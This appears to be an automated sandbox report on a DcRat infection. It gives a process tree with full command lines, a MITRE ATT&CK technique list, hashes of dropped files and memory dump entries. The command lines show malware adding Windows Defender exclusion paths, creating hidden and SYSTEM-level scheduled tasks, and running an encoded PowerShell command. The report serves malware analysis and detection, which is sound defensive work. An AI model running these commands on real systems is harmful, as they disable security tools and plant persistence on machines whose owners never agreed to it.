C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe (tree depth 2)
  command line: schtasks /CREATE /TN "grVdSBQdv" /SC once /ST 08:24:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  (the -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
  - DcRat
  - Executes dropped EXE
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (tree depth 2)
  command line: schtasks /run /I /tn "grVdSBQdv"

C:\Windows\SysWOW64\schtasks.exe (tree depth 2)
  command line: schtasks /DELETE /F /TN "grVdSBQdv"

C:\Windows\SysWOW64\schtasks.exe (tree depth 2)
  command line: schtasks /CREATE /TN "CHeJVxoJwhzmREGSo" /SC once /ST 15:10:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe\" sG /site_id 525403 /S" /V1 /F
  - DcRat
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (tree depth 2)
  command line: schtasks /run /I /tn "CHeJVxoJwhzmREGSo"

C:\Users\Admin\AppData\Local\cache\MoUSO.exe (tree depth 1)
  command line: C:\Users\Admin\AppData\Local\cache\MoUSO.exe

C:\Users\Admin\AppData\Roaming\dahbvur (tree depth 1)
  command line: C:\Users\Admin\AppData\Roaming\dahbvur

C:\Users\Admin\AppData\Roaming\vvhbvur (tree depth 1)
  command line: C:\Users\Admin\AppData\Roaming\vvhbvur

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (tree depth 1)
  command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (same encoded command as the "grVdSBQdv" task above; decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)

C:\Windows\system32\gpupdate.exe (tree depth 2)
  command line: "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe (tree depth 1)
  command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe (tree depth 1)
  command line: gpscript.exe /RefreshSystemParam

C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe (tree depth 1)
  command line: C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe sG /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe (tree depth 2)
  command line: schtasks /DELETE /F /TN "booXbIzkEgfNdKvxAC"

C:\Windows\SysWOW64\cmd.exe (tree depth 2)
  command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe (tree depth 2)
  command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe (tree depth 2)
  command line: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\QMuGxDzxU\CbCNPA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cPyDayBYNpjUpuO" /V1 /F
  - DcRat
  - Creates scheduled task(s)

C:\Windows\system32\WerFault.exe (tree depth 1)
  command line: C:\Windows\system32\WerFault.exe -pss -s 524 -p 5788 -ip 5788
MITRE ATT&CK Matrix (ATT&CK v6)

Persistence
- Modify Existing Service (3)
- New Service (1)
- Hidden Files and Directories (2)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)

Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- Hidden Files and Directories (2)
- Impair Defenses (1)
- File Permissions Modification (1)
- Install Root Certificate (1)
Downloads
C:\Documents and Settings\WaaSMedicAgent.exe
MD5: 53c1dc18657ab07de3c6ae7776b7bf39
SHA1: 3ddfe3709a2b299a3e0dba866516734ee4b23275
SHA256: 7b21188396d28d8de129de2a44042a4d57b42afcb6fd826628e8b6637b071f89
SHA512: ae2edf1375756add690656f78c60cd0785afa6beea30c8070dd2be6762033ec0f3ed11e4006b11ef3a42b7db75de46cfefba3810f5a7054825dc766dd2b649da

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8zeYyAhCLyy4MXuHDcnSZuq6.exe.log
MD5: a1f96913c2af719f78eeb8e8ed0e4f05
SHA1: b868e84dae088fd7b3ead66b83a012e54a3568b7
SHA256: 182673fba144b5cabdf24381bf82d8b1a5379a4a2ab96819db9d367a81cc2acb
SHA512: fa99c1f40d9618ef0c493aaa16dd38a10346ddb0c4ca00e27400ca7ed701f5e05be1c807218459c2c05cce47a35103444c05d824d7a7f5fe8b33fca2bac28a0b
C:\Users\Admin\AppData\Local\Temp\2783.bat (zero-byte file: these are the digests of empty input)
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_1.exe
MD5: cd7484811f927da2302bb6a1054802cf
SHA1: e19672a18f519e7b67d9bd4ce29f82c503b146ff
SHA256: 07c90bc38116212caa3e704a39f04c60d204659ae6b0a59b7b172a15ca4dc8d7
SHA512: 356b7b88eafa73f12269f31be30be88456c1191c674b669b64a5142fb9f26a24f0937ab6b8b6ac18c5eacd81388f22ca89b6a04a7f13495905587c72886dc81b

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_1.txt
MD5: cd7484811f927da2302bb6a1054802cf
SHA1: e19672a18f519e7b67d9bd4ce29f82c503b146ff
SHA256: 07c90bc38116212caa3e704a39f04c60d204659ae6b0a59b7b172a15ca4dc8d7
SHA512: 356b7b88eafa73f12269f31be30be88456c1191c674b669b64a5142fb9f26a24f0937ab6b8b6ac18c5eacd81388f22ca89b6a04a7f13495905587c72886dc81b

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_2.exe
MD5: 2106404b9f606ae729006fe497f6ccaa
SHA1: 463383c4c6f4a56c317b4dfdb6f8f7a4011b8afc
SHA256: c82be3945c3d7689c2be77e995050ac437ea5786ab0bc128d5e31262096dd353
SHA512: 7800b887b84da2e78dd4ab8d9c4cfec65c5af61c8387f30994e7ea8fb0aa69e1d61732b30a00ec7067afc7ffad44ddcdcd29ab4268ba92621b665c58078633f9

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_2.txt
MD5: 2106404b9f606ae729006fe497f6ccaa
SHA1: 463383c4c6f4a56c317b4dfdb6f8f7a4011b8afc
SHA256: c82be3945c3d7689c2be77e995050ac437ea5786ab0bc128d5e31262096dd353
SHA512: 7800b887b84da2e78dd4ab8d9c4cfec65c5af61c8387f30994e7ea8fb0aa69e1d61732b30a00ec7067afc7ffad44ddcdcd29ab4268ba92621b665c58078633f9

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_3.exe
MD5: 6e487aa1b2d2b9ef05073c11572925f2
SHA1: b2b58a554b75029cd8bdf5ffd012611b1bfe430b
SHA256: 77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597
SHA512: b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_3.txt
MD5: 6e487aa1b2d2b9ef05073c11572925f2
SHA1: b2b58a554b75029cd8bdf5ffd012611b1bfe430b
SHA256: 77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597
SHA512: b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_4.exe
MD5: 5668cb771643274ba2c375ec6403c266
SHA1: dd78b03428b99368906fe62fc46aaaf1db07a8b9
SHA256: d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384
SHA512: 135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_4.txt
MD5: 5668cb771643274ba2c375ec6403c266
SHA1: dd78b03428b99368906fe62fc46aaaf1db07a8b9
SHA256: d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384
SHA512: 135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_5.exe
MD5: 6c3e0a1c839e28ca5b7c12695bd50c9d
SHA1: f3c2177fabb8dee68cad911a56e221bae930a12f
SHA256: 2a1feb403763df26a3c2be574e79c8743ecb40d169cfbee3fbcd87fe15baca12
SHA512: 980940730f8227de7337cd698aa9aa41eb8581dad02ad0e9c3ca0586fc94245e3892ce8d9d84b1d312eebe6576faf0e1872994d32a75e7706589afd68189af53

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_5.txt
MD5: 6c3e0a1c839e28ca5b7c12695bd50c9d
SHA1: f3c2177fabb8dee68cad911a56e221bae930a12f
SHA256: 2a1feb403763df26a3c2be574e79c8743ecb40d169cfbee3fbcd87fe15baca12
SHA512: 980940730f8227de7337cd698aa9aa41eb8581dad02ad0e9c3ca0586fc94245e3892ce8d9d84b1d312eebe6576faf0e1872994d32a75e7706589afd68189af53

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_6.exe
MD5: bdd81266d64b5a226dd38e4decd8cc2c
SHA1: 2395557e0d8fd9bcfe823391a9a7cfe78ee0551a
SHA256: f4031df5e0df4785513fd9fc9843e0aba4623e61b58cd163354ea64f9133b388
SHA512: 5013de02342de9e84e27f183e6abb566aec066f0aba3072ff3330bc0183b1f46581fd35f53cd2c8099a89668596541e37dd31b8c03b0cb93d816ce3694f40686

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_6.txt
MD5: bdd81266d64b5a226dd38e4decd8cc2c
SHA1: 2395557e0d8fd9bcfe823391a9a7cfe78ee0551a
SHA256: f4031df5e0df4785513fd9fc9843e0aba4623e61b58cd163354ea64f9133b388
SHA512: 5013de02342de9e84e27f183e6abb566aec066f0aba3072ff3330bc0183b1f46581fd35f53cd2c8099a89668596541e37dd31b8c03b0cb93d816ce3694f40686

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
MD5: 5632c0cda7da1c5b57aeffeead5c40b7
SHA1: 533805ba88fbd008457616ae2c3b585c952d3afe
SHA256: 2b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43
SHA512: e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.txt
MD5: 5632c0cda7da1c5b57aeffeead5c40b7
SHA1: 533805ba88fbd008457616ae2c3b585c952d3afe
SHA256: 2b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43
SHA512: e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurl.dll
MD5: d09be1f47fd6b827c81a4812b4f7296f
SHA1: 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256: 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512: 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurlpp.dll
MD5: e6e578373c2e416289a8da55f1dc5e8e
SHA1: b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256: 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512: 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libgcc_s_dw2-1.dll
MD5: 9aec524b616618b0d3d00b27b6f51da1
SHA1: 64264300801a353db324d11738ffed876550e1d3
SHA256: 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512: 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libstdc++-6.dll
MD5: 5e279950775baae5fea04d2cc4526bcc
SHA1: 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256: 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512: 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libwinpthread-1.dll
MD5: 1e0d62c34ff2e649ebc5c372065732ee
SHA1: fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256: 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512: 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe
MD5: b89c63432969e7cd13353f01e4bf4a52
SHA1: d2c33736f29d1e8b6cb40c4bf72164b80122686c
SHA256: 317db2eae7751c6a4533df608dec3986ee101b9fee94eb26bac5a21e26b7bcb5
SHA512: ca575df3c67c37b132afb56e66912bf9bc3130c5011da3e2b8cc022c3f5791fb3448510a1974ec0df30372a0d6ffeabbfa349fa0ea80888fdb8da92853e8eaa7
C:\Users\Admin\AppData\Local\Temp\CC4F.tmp
MD5: 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1: e16506f662dc92023bf82def1d621497c8ab5890
SHA256: 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512: 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219
C:\Users\Admin\AppData\Local\Temp\Uwqurfoyhf.tmp
MD5: d2b9b4254dd8cd2e94ba6e833cc5b48f
SHA1: 3a7db9c8f59313e0253882b262a9ef1c237c0d45
SHA256: 3134dd27cab347c041e3cd4ce762fa52b0829490a35759ba2f0acb827d8bda8a
SHA512: d22df5a5effda4acf02743473189cc661db20de07f5adfdd638b251f8944fb5a627c123a17c4aa267c9c5efd39c6d0dfe0edce26091515cf9775bc8adbb99f9a

C:\Users\Admin\AppData\Local\Temp\axhub.dat
MD5: 13abe7637d904829fbb37ecda44a1670
SHA1: de26b60d2c0b1660220caf3f4a11dfabaa0e7b9f
SHA256: 7a20b34c0f9b516007d40a570eafb782028c5613138e8b9697ca398b0b3420d6
SHA512: 6e02ca1282f3d1bbbb684046eb5dcef412366a0ed2276c1f22d2f16b978647c0e35a8d728a0349f022295b0aba30139b2b8bb75b92aa5fdcc18aae9dcf357d77

C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5: 7b61795697b50fb19d1f20bd8a234b67
SHA1: 5134692d456da79579e9183c50db135485e95201
SHA256: d37e99805cee2a2a4d59542b88d1dfc23c7b166186666feef51f8751e940b174
SHA512: 903f0e4a5d676be49abf5464e12a58b3908406a159ceb1b41534dc9b0a29854e6fa0b9bb471b68d802a1a1d773523490381ef5cebdd9f27aeb26947bc4970a35
C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe
MD5: 289e538ea6c1389e81e0723e0bf9462c
SHA1: 7a6a3cf76bd2c8dd53e613e4352ca22396cf931c
SHA256: 434f2ac494360c48a45ac5f142033fa28c2c14fb19c0e9532f73b50c680bcb50
SHA512: f2710f96c434d3c9a51c46fddc5fd9188ff0fb5a33a05ba2a91f8a2f061938e240e4b0b9d1c642ca63e4986a7767d6f532aba0078e72a3c2c840457eb8c63e8f
C:\Users\Admin\AppData\Local\Temp\ezokegez.exe
MD5: 3a940ddd03f329ad6dbd65535651e6b1
SHA1: 2983e680bd6264e0d700f12a802b57ac14936d99
SHA256: 757c64e8640e8bc0774a99797896a108613054d86c816288c4a59703aacab159
SHA512: acce5f763c023e5082a133dbd819188c63178f5c7f3942cfb2c10d36e82eedd7dcae708a0bc56d9454531cd44c8d7d8d40db849822106e9d860039474ffb8732

C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt (first version written)
MD5: b7161c0845a64ff6d7345b67ff97f3b0
SHA1: d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256: fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512: 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt (second version, different content at the same path)
MD5: 41a6c0ccdf91a52a40cbda7643f31f35
SHA1: 2b71dbbe62523833a04c9d6d09fc3a21cf0c4ca7
SHA256: 640b404a7ba6d7fef10b4fb6808bee89877f7cbfb945b81164db1be67a008ab4
SHA512: d1a0257713daef8d5d58b2eaa1d91ec2a10d317e276d14e0b0e9aee059a5bf5923cfc7a020ab963117a171708d7c85e71c19d4b5ff1f4af6deb03cfbfad1b788

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (first version written)
MD5: 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1: 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256: a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512: 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (second version, different content at the same path)
MD5: a6279ec92ff948760ce53bba817d6a77
SHA1: 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256: 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512: 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
MD5: fdf61083916d3905a26398ac32fde6a1
SHA1: 9f44a5dec8bc8674e2bc659d6abd0639dcb4ab34
SHA256: d4f1222e5ed894e7e05e8aa720835b66432c0aa4fdeb78113a468d235f012345
SHA512: e67f8bc4f48c8e32f8de3b6e8c219c4df612b62d3e8900ef515edd9d233ca3fcab84e8c55da4b25cb7df59e099d9db2aeaa26501e0170e71536ffdb6a38e2a25
C:\Users\Admin\AppData\Local\Temp\yfXLZxBfsx.bat
MD5: 9f8f286b72aba0d6337cc37e0b0891c9
SHA1: 5af9142a6a4b004d4e0692ed0a822d67163b4008
SHA256: 6626782257f1394967c873ad47d31d9da8772f3e2f58f7856a0edc0d6d6cb356
SHA512: 9228329eda8320f96eb89d25ba1a2dc00d5217dcfe9deda7440bca90eff1a859158544b9d393698f238b59dc9614ebf659be359041836453bca3dca86a492572

C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe
MD5: 5db4e7f04bb163a1337f216ee2076568
SHA1: d1f09aadd4d7583c18a5dbe889477179718de362
SHA256: 12cdcdee943f989fc68b7781176572822605b5ace00dcdb445e58e6bf60c9a5a
SHA512: 2b14db4807294180165c472a16fcb1ce4fd156165d760b6d0c6eb176e8775e67097db629a88c66ec1ff69e31772455e7957beea20f2288b03647f5134de83263
C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe
MD5: a4cbfe98a432378d938d3772d89e8f8a
SHA1: 37ea0a7524b90a0a239636fc544cfefe2d829999
SHA256: c2c0bcef434f8f91ccf5816e53931838faea22f53cd317bf27cfca8bc0a99b5c
SHA512: 5e112a920bf118e5b3ddfb6356b030f788d643a9c9ec2dd21075999193313c87ca5bda0a37d448feaf3cf778cf3babbcbc73790e87710d28ceb6c07482d96500
C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe (same content as the WaaSMedicAgent.exe copies listed in this section)
MD5: 53c1dc18657ab07de3c6ae7776b7bf39
SHA1: 3ddfe3709a2b299a3e0dba866516734ee4b23275
SHA256: 7b21188396d28d8de129de2a44042a4d57b42afcb6fd826628e8b6637b071f89
SHA512: ae2edf1375756add690656f78c60cd0785afa6beea30c8070dd2be6762033ec0f3ed11e4006b11ef3a42b7db75de46cfefba3810f5a7054825dc766dd2b649da
C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe
MD5: 430a6410a38c00c751dc2f0981c7e65c
SHA1: 546ef76dbc37583bb6185bfa8804995f6fab7c36
SHA256: 9b12833483586a2f7ea1a1f2236948ae760f90011e601e0320d46716c3ea44fe
SHA512: 17bf583912724d331862a5bbf2281840fe4b5947e4308a761028c8af8cd1a8999502f1e661bdf3f194c98746828b545b374ec9b97735fd68f3a451ba29bb0e47
C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe
MD5: ab5e336df7219dc233029967e7c13ff4
SHA1: 5e3e4f57e0bf96d3443cfa8637672b39a0676b36
SHA256: 3791c99cca719add78fbfffd3f54f3440596f7a99c8e2a76fee25d3cdbd1271d
SHA512: 812c346ab88c597307b2fa2fa3db07fe7862f15bbdff8a44f9d390fd58f1120301801d0b02e0dc5f62d62958bc1f71947089201dfafef52cbc4dba4807ea374a
C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe
MD5: 8446d7818c5a7fff6839fe4be176f88e
SHA1: b094ebde855d752565f9fce2ddfb93b264060904
SHA256: c83b17d316e93347d1a282646c5eb340662c9a51e38f7ea4a233f8f23fe59652
SHA512: f10e7c5bdf076278c678a860b413774a930996211dcd0dee96b323d56761207a08e7da5ffdaa33dc3a1f03738aad86cf855f48d8b70c72ff8b796ace3eb6c42d
C:\Users\WaaSMedicAgent.exe
MD5: 53c1dc18657ab07de3c6ae7776b7bf39
SHA1: 3ddfe3709a2b299a3e0dba866516734ee4b23275
SHA256: 7b21188396d28d8de129de2a44042a4d57b42afcb6fd826628e8b6637b071f89
SHA512: ae2edf1375756add690656f78c60cd0785afa6beea30c8070dd2be6762033ec0f3ed11e4006b11ef3a42b7db75de46cfefba3810f5a7054825dc766dd2b649da

C:\Windows\SysWOW64\uefifces\ezokegez.exe (same content as C:\Users\Admin\AppData\Local\Temp\ezokegez.exe)
MD5: 3a940ddd03f329ad6dbd65535651e6b1
SHA1: 2983e680bd6264e0d700f12a802b57ac14936d99
SHA256: 757c64e8640e8bc0774a99797896a108613054d86c816288c4a59703aacab159
SHA512: acce5f763c023e5082a133dbd819188c63178f5c7f3942cfb2c10d36e82eedd7dcae708a0bc56d9454531cd44c8d7d8d40db849822106e9d860039474ffb8732
Memory dumps (process id-index-address range, file size)

memory/1328-297-0x0000000000748000-0x00000000007B4000-memory.dmp: 432KB
memory/1368-315-0x0000000003C30000-0x0000000003D70000-memory.dmp: 1.2MB
memory/1368-353-0x0000000003C30000-0x0000000003D70000-memory.dmp: 1.2MB
memory/1368-241-0x0000000000400000-0x0000000000629000-memory.dmp: 2.2MB
memory/1368-351-0x0000000003C30000-0x0000000003D70000-memory.dmp: 1.2MB
memory/1368-284-0x0000000003070000-0x0000000003A9B000-memory.dmp: 10.2MB
memory/1368-313-0x0000000003C00000-0x0000000003C01000-memory.dmp: 4KB
memory/1368-318-0x0000000003C10000-0x0000000003C11000-memory.dmp: 4KB
memory/1368-244-0x0000000077B70000-0x0000000077D13000-memory.dmp: 1.6MB
memory/1368-317-0x0000000003C30000-0x0000000003D70000-memory.dmp: 1.2MB
memory/1368-238-0x0000000000400000-0x0000000000629000-memory.dmp: 2.2MB
memory/1368-307-0x0000000003BF0000-0x0000000003BF1000-memory.dmp: 4KB
memory/1368-309-0x0000000003070000-0x0000000003A9B000-memory.dmp: 10.2MB
memory/1368-321-0x0000000002270000-0x0000000002271000-memory.dmp: 4KB
memory/1368-319-0x0000000003C30000-0x0000000003D70000-memory.dmp: 1.2MB
memory/1368-320-0x0000000003C30000-0x0000000003D70000-memory.dmp: 1.2MB
memory/1368-240-0x00000000024A0000-0x00000000026BD000-memory.dmp: 2.1MB
memory/1368-239-0x00000000023B7000-0x0000000002493000-memory.dmp: 880KB
memory/1420-263-0x0000000000535000-0x0000000000542000-memory.dmp: 52KB
memory/1420-271-0x0000000000535000-0x0000000000542000-memory.dmp: 52KB
memory/1600-322-0x0000000074470000-0x00000000744BC000-memory.dmp: 304KB
memory/1600-301-0x0000000072140000-0x00000000721C9000-memory.dmp: 548KB
memory/1600-295-0x0000000077940000-0x0000000077B55000-memory.dmp: 2.1MB
memory/1600-316-0x0000000076930000-0x0000000076EE3000-memory.dmp: 5.7MB
memory/1600-293-0x0000000000F20000-0x0000000000F21000-memory.dmp: 4KB
memory/1660-187-0x0000000004510000-0x0000000004519000-memory.dmp: 36KB
memory/1660-186-0x00000000044C0000-0x00000000044C8000-memory.dmp: 32KB
memory/1660-191-0x0000000000400000-0x00000000043D0000-memory.dmp: 63.8MB
memory/2072-214-0x0000000006620000-0x0000000006BC4000-memory.dmp: 5.6MB
memory/2072-217-0x00000000736B0000-0x0000000073E60000-memory.dmp: 7.7MB
memory/2072-221-0x0000000006200000-0x0000000006250000-memory.dmp: 320KB
memory/2072-220-0x0000000003240000-0x0000000003241000-memory.dmp: 4KB
memory/2072-211-0x0000000000100000-0x000000000053E000-memory.dmp: 4.2MB
memory/2072-227-0x0000000007100000-0x000000000762C000-memory.dmp: 5.2MB
